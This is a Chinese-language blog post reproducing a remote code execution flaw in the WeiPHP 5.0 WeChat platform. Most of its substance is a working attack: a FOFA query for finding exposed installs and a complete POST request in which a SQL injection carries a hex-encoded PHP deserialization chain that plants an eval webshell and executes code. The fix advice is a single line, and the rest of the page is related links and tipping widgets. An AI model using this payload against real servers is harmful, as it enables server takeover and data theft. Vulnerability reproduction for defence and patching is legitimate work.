WeiPHP5.0远程代码执行漏洞

于 2024-03-12 15:10:38 发布
阅读量732 收藏 7
点赞数 13
分类专栏: 漏洞复现 文章标签: WeiPHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46944519/article/details/136652499
版权

文章目录

前言

weiphp 是一个开源,高效,简洁的微信开发平台

声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。

二、影响版本

weiphp5.0
在这里插入图片描述

三、漏洞复现

FOFA:body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0"
在这里插入图片描述
漏洞链接:http://127.0.0.1/public/index.php/weixin/Notice/index?img=echo+md5(1);exit();

漏洞数据包:

POST /public/index.php/weixin/Notice/index?img=echo+md5(1);exit(); HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 1340
Content-Type: application/x-www-form-urlencoded

<xml>
<product_id>aaaa</product_id>
<appid>exp</appid>
<appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>
<mch_id>aaa</mch_id>
<nonce_str>aaa</nonce_str>
<openid>aaa</openid>
</xml>

执行MD5加密值
在这里插入图片描述
执行phpinfo()函数指针
在这里插入图片描述

四、修复建议

请关注官网更新 :https://www.weiphp.cn/

李火火安全阁
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
weiphp5.0存在远程代码执行漏洞
nnn2188185的博客
03-11 143
weiphp5.0存在远程代码执行漏洞
WeiPHP 微信开发平台 SQL注入漏洞复现
最新发布
0xSec
12-05 911
weiphp微信开发平台 _send_by_group、wp_where、 get_package_template等接口处存在SQL注入漏洞,攻击者利用此漏洞可获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
WeiPHP5.0 SQL注入(CNVD-2020-67556 )漏洞复现
weixin_68999845的博客
09-21 514
WeiPHP5.0 SQL注入(CNVD-2020-67556 ) 漏洞复现
weiphp5.0 cms审计之exp表达式注入 - 先知社区1
08-03
weiphp5.0 cms审计之exp表达式注入 - 先知社区1
[代码审计]Weiphp5.0 前台文件任意读取分析
Y4tacker的博客
05-09 1281
文章目录前言分析 前言 最近一直在刷CNVD吧,大概两周刷了四页多,感觉自己水平也在见着长高,今天来分析一下Weiphp,毕竟也很久没写过博客了 分析 漏洞所在的函数为application/material/controller/Material.php下的_download_imgage函数,正好这是一个public方法,根据thinkphp的路由规则我们不难得到传参方式,这里直接先给出exp然后继续分析好吧 http://ddcms.top//public/index.php/material/Ma
onethink php7,OneThink_V1.1在php7 下出错问题
weixin_39995108的博客
03-22 146
一直使用OneThink是一个开源的内容管理框架,基于最新的ThinkPHP3.2版本开发,提供更方便、更安全的WEB应用开发体验,采用了全新的架构设计和命名空间机制,融合了模块化、驱动化和插件化的设计理念于一体,开启了国内WEB应用傻瓜式开发的新潮流。原来一直使用php5.6,程序运行很完美,升级到出现错误的原因好像是默认文档中 推荐字段(position)未空时,在进行数组转字符串时,出现错误...
thinkphp 3.x下的任意文件包含(有条件)分析
09-19 407
漏洞原理 实现自己的模版引擎不当,在模版渲染的情况下存在任意变量覆盖漏洞。。 漏洞详情 漏洞位置1 ThinkPHP/Library/Think/View.class.php 需要修改配置文件 指定TMPL_ENGINE_TYPE为php if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { // 使用PHP原生模板 // 模板阵列变量分解成为独立变量 extract($this->tVar,...
weiphp微信公众平台框架 v3.0 正式版
12-10
weiphp是一个开源,高效,简洁的微信开发平台,它是基于oneThink这个简单而强大的内容管理框架实现的。
weiphp框架
01-14
weiphp
weiphp:微信公众平台开源代码2.0
03-24
微信 微信公众平台开源代码2.0
weiphp开源框架
07-09
强大的微信开源后台框架,在此基础上省去繁琐的微信对接
116 thinkphp 3.1 sql注入
fancivez的专栏
12-12 2775
http://www.wooyun.org/bugs/wooyun-2010-086737 简要描述: ThinkPHP框架本身缺陷导致SQL注入漏洞,基本影响所有使用ThinkPHP开发的应用,包括thinksns、onethink等,这里以thinkphp自家的OneThink为例。 这个猛料,希望能加精呀~ 详细说明: 很多人天真的以为,使用了框架提供的数据
curl
csdn_jiangpeng的博客
01-16 204
/** * get * post方式请求资源 * @param string $url 基于的baseUrl * @param int $flag 标志位 * @param array $header 头部 * @return string 返回的资源内容 */ function curl_get($url, $flag = 0, $header = []) {...
攻防世界--weiphp
qq_46263951的博客
01-19 1343
这道题原本应该是通过.git源码泄漏获取到源码,利用工具githack,可能是环境的问题,执行完发现目录是空的 直接从网上找源码,可能比源代码的内容要多一些 GitHub - weiphpdev/weiphp5.0: WeiPHP5.0,公众号与小程序结合的最佳开发框架,,它实现一个后台同时管理和运营多个客户端(公众号,微信小程序,后续将支持支付宝小程序,百度小程序等) 进入后的页面为一个登陆框,将login改为register发现该功能被禁用了 前台SQL注入 由于这里对title参数并没有检.
web安全(6)-- 任意文件上传漏洞
热门推荐
TaneRoom的博客
11-21 1万+
上传漏洞这个顾名思义,就是攻击者通过上传木马文件,直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。 导致该漏洞的原因在于代码作者没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。
weiphp5.0安装过程遇到的两个问题
alanbj的专栏
04-29 1186
weiphp5.0安装过程遇到的两个问题 问题描述:weiphp5.0安装时提示404错误 安装环境:CentOS 6.5 64bits + lnmp1.3 第1页可以正常打开: 点击“同意安装协议”之后,一直提示404 File Not Found错误 根据网友的经验,把nginx的配置改成: locati...
微信开发学习日记(五):weiphp开源框架的bug,公众号权限编辑问题
weixin_30867015的博客
04-14 123
最近在研究weiphp,总体感觉还行,bug据说还挺多。这不,我就遇到一个比较严重影响使用的。感觉不太应该出现这么严重的bug啊。 weiphp的微信公众号等级,权限增加和编辑bug,看不到权限列表,只能看到“好人”和“环境”2个不正确的插件名称。[系统BUG] 用户权限无法正常显示问题描述:用户->公众号等级->编辑 出现好人与环境两个插件解决办法:后台新增加公众帐号等级错误...
Weiphp框架
foyuebukeshuo的专栏
03-30 179
Weiphp这个框架使用方法 weiphp这个框架,安全性,对这方面不太熟悉,有没有熟练的大神可以交流下? 因为今天查看了一个微信APP 钱耳朵上的 相关后台数据,发现诸多漏洞,作为一个互联网金融的平台,对公众粉丝的资金处境很是危险。 今天已经在其平台善意留言提醒。
STORAGE_WRITE_ERROR
07-28
引用\[1\]:错误位置FILE: /export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Storage/Driver/File.class.php  LINE: 47TRACE#0 /export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Storage/Driver/File.class.php(47): E('_STORAGE_WRITE_...')#1 \[internal function\]: Think\Storage\Driver\File->put('./Application/R...', ' 。 引用\[2\]:#2 /export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Storage.class.php(37): call_user_func_array(Array, Array)#3 /export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Template.class.php(110): Think\Storage::__callstatic('put', Array)#4 /export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Template.class.php(110): Think\Storage::put('./Application/R...', ' 。 引用\[3\]:Thinkphp二次开发的程序很多,不得不说这是一个非常强大的程序,稍加开发,就能成为功能齐全的成品程序,无忧主机php免备案空间中也有很多这样的程序。无忧小编今天遇到一个客户,他说他安装网站的时候遇到报错了,报错内容如下: 。 问题:STORAGE_WRITE_ERROR 回答: STORAGE_WRITE_ERROR是一个错误信息,它出现在/export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Storage/Driver/File.class.php文件的第47行。这个错误通常是由于存储驱动器无法写入文件导致的。\[1\]根据错误信息的堆栈跟踪,可以看到在/export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Storage/Driver/File.class.php文件的put方法中出现了错误。\[2\]这个错误可能是由于权限问题或者文件路径错误引起的。如果您遇到这个错误,您可以检查文件的权限和路径是否正确,并确保存储驱动器有写入文件的权限。\[3\]如果问题仍然存在,您可以尝试联系程序开发者或者技术支持寻求帮助。 #### 引用[.reference_title] - *1* *2* [ThinkPHP3.2.2报错:_STORAGE_WRITE_ERROR_,_PHP教程](https://blog.csdn.net/weixin_42514616/article/details/116060696)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Weiphp安装报错 STORAGE_WRITE_ERROR_:./Runtime/Cache/Install/](https://blog.csdn.net/weixin_36115023/article/details/116060697)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李火火安全阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值